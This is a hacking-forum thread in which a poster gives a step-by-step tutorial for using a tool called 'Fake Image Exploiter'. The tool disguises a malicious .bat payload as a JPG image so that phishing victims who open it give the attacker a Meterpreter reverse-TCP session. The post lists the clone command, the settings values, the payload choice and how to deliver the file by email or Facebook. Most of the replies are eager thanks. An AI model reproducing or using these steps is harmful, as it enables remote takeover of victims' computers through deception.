Aang

How to gain access to a PC with a simple IMAGE ! [ GAIN LIFTIME ACCESS AF ]

In this new thread , I'll introduce to you a newly launched hacking tool “Fake Image Exploiter”. It is designed so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with a hidden malicious .bat/.exe file inside it. :smart: :smart:

This way is undetectable and easy for anyone to perform specially the beginners :fiesta:

after doing this all you have to do is to send the image through E-Mail or Facebook [ WHATEVER] :kappa:

So , let's start The tutorial

Before , We start Don't forget to give a like :pogchamp: :pogchamp:  So I can continue Posting Fucken HQ Threads :ezy: :ezy:

LEECHERS WILL BE REPORTED AND BANNED

LIKE = GOOD MEMBER :hype:

NO LIKE = LEECHER AND WILL BE BANNED IMMEDIATELY :pepi: :pepi: :pepegun:

[hide]Let’s start!

Open the terminal inside your Kali Linux and type following command to download it from GitHub.

git clone //github.com/r00t-3xp10it/FakeImageExploiter.git

Once it gets downloaded then opens the folder and selects the file “settings” for configuration before running the program

Now make some changes inside the setting file Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any extension among these four: ps1, bat, txt, exe.  I had set PAYLOAD_EXETNSION=bat similarly set BYPASS_RH=NO  and scroll down for next configuration.

In the same way, set these two values also  then save the changes.

AUTO_PAYLOAD_BUILD=YES

AGENT_HANLER_PORT=4444

After making certain changes in setting file then open the terminal and run the program file:

cd FakeImageExploiter

./FakeImageExploiter.sh

Click on YES to execute framework.

Select payload to build as I had chosen window/meterpreter/reverse_tcp for the attack.

After then a pop-up box will open which will allow choosing any jpg image so that it could hide .bat file payload inside that image.

Now select the icon for your malicious image.

Give a name to your payload which will be displayed to the victim as file name

Now it generates a link

send this link to the victim. Now victim will download the zip file you already named [ EX:GAME]

When victim will click on GAME.jpg , we will get a meterpreter session at the background on Metasploit framework.

You need to have port forwarding and kali linux for this tutorial or you can install these tools on windows [ EASY , Just search on youtube how to do it ][/hide]

thnaks for sharing this

Amazing share, my friend! You just got another like!

Btw, congrats on your new premium account, you deserved it!

wtf iis that ?

want to see bro thks

In this new thread , I'll introduce to you a newly launched hacking tool “Fake Image Exploiter”. It is designed so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with a hidden malicious .bat/.exe file inside it. :smart: :smart:

This way is undetectable and easy for anyone to perform specially the beginners :fiesta:

after doing this all you have to do is to send the image through E-Mail or Facebook [ WHATEVER] :kappa:

Before , We start Don't forget to give a like :pogchamp: :pogchamp:  So I can continue Posting Fucken HQ Threads :ezy: :ezy:

hmm thxnks a lot in began :fiesta: :fiesta: :fiesta:

thnaks for sharing this

Well it would be intresting!Anyways thanks for the share XD

NO LIKE = LEECHER AND WILL BE BANNED IMMEDIATELY :pepi: th

thanks let me me get my glasses

Thanks for the Program, will check it out! ;)

i am new to this but am interested to check it out

Lets try this thing!!

is this working also with converted image like posted ones?

Lool Seems Funny Hope its working

Thanks for sharing!